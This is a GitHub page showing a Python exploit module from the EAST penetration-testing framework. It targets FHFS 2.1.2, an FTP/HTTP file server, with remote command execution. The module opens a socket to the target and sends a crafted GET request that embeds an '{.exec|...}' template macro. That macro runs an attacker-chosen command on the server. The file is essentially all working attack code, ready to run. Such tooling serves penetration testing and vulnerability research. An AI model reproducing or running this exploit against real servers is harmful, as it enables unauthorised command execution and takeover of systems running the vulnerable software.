Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
71 lines (62 sloc) 2.32 KB
#! /usr/bin/env python
# -*- coding: utf_8 -*-
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
import sys
import socket
sys.path.append("./core")
from Sploit import Sploit
INFO = {}
INFO['NAME'] = "ef_fhfs_rce"
INFO['DESCRIPTION'] = "FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution"
INFO['VENDOR'] = "http://sourceforge.net/projects/fhfs/"
INFO['DOWNLOAD_LINK'] = 'http://sourceforge.net/projects/fhfs/'
INFO['LINKS'] = 'https://www.exploit-db.com/exploits/37985/'
INFO["CVE Name"] = ""
INFO["NOTES"] = """
FHFS is a FTP and HTTP Web Server package, transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website, good for schools, businesses, etc. whose students/employees need to easily transport files.
"""
INFO['CHANGELOG'] = "08 Sep 2015. Written by Gleg team."
INFO['PATH'] = 'Exploits/General/'
# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = "127.0.0.1"
OPTIONS["PORT"] = "80"
OPTIONS["CMD"] = 'stop.bat'
class exploit(Sploit):
def __init__(self, host = "", port = 0, logger = None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.cmd = OPTIONS['CMD']
self.host = host
self.port = port
self.state = "running"
return
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.cmd = self.args.get('CMD', self.cmd)
return
def run(self):
self.args()
client = socket.socket()
try:
client.connect((self.host, self.port))
data = "GET /?{.exec|" + self.cmd + ".} HTTP/1.1\r\n\r\n"
client.send(data)
client.close()
self.log('Success. Command executed')
self.finish(True)
return 1
except:
self.log('Failed')
self.finish(False)
return 0
if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit("192.168.0.1", 80)
e.run()